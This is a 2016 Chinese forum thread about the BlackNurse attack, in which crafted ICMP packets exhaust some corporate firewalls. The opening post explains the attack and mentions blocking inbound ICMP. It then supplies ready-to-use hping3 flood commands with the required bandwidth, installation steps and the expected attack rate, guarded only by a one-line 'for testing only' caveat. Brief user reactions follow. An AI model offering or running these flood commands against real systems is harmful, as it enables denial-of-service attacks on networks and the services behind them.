用这招一台笔记本就能黑翻大型服务器

henry1118 · 发表于 2016-11-14 16:50:34

以往黑客在针对网络服务器发动攻击时常常会动用大量的“肉鸡”来同时向服务器发送请求，从而导致服务器信息拥堵崩溃。但来自TDC安全运营中心的技术人员发现一种全新的攻击方式，黑客只需要一台笔记本就能够让大型网络服务器宕机。这种新的攻击技术名为BlackNurse，它的精髓不是利用大量的信息流来轰炸服务器，而是通过发送特殊形式的Internet控制消息协议数据包来让服务器防火墙自己产生大量的冗余信息，最终把自己“噎死”。目前，BlackNurse已经被验证对采用Cisco、Palo Alto Networks方案部署的服务器防火墙能够奏效。不过，TDC技术人员表示，目前已经有可以防止BlackNurse攻击的方法。用户需要设置防火墙过滤规则，阻止外部ICMP数据包进入。对此，Cisco、Palo Alto Networks都表示自己的防火墙都默认屏蔽外部ICMP数据包，但也不排除部分用户基于特殊需要而开放这一规则。在允许外部ICMP数据包进入的情况下，任何一台计算机都可能触发BlackNurse攻击。

根据记载

你需要 15-18 Mbit/s. 带宽

用 Hping3 下面任意一个命令

hping3 -1 -C 3 -K 3 -i u20
hping3 -1 -C 3 -K 3 --flood

会产生大约 180 Mbit/s DoS attack

///////////////////////////////////////////////////////////////////
Install HPing

1: Install EPEL Repository

shell> sudo yum install epel-release

2: Install HPing3

shell> sudo yum install hping3
////////////////////////////////////////////////////////////////////

请仅仅用于网站测试

参考网址 http://blacknurse.dk/

潜水看美女 · 发表于 2016-11-14 17:19:30

黑客之最高境界，用最简单的招式，干翻最强有力的FW

斜阳晚暮 · 发表于 2016-11-14 16:59:18

180M就黑翻大型服务器了？

dengxin6 · 发表于 2016-11-14 17:04:07

斜阳晚暮发表于 2016-11-14 16:59

180M就黑翻大型服务器了？
天朝100M基本都翻了吧不过这种攻击防火墙很容易防的

gmal · 发表于 2016-11-14 16:59:00

水贴

lzdszdl · 发表于 2016-11-14 17:08:31

厉害了

ecc · 发表于 2016-11-14 17:12:41

厉害了

Vicer · 发表于 2016-11-14 17:15:10

N-1年前的文章？？有那么神吗，，

低调路过 · 发表于 2016-11-14 17:16:00

现在都有opts了

		自动登录	找回密码
密码			立即注册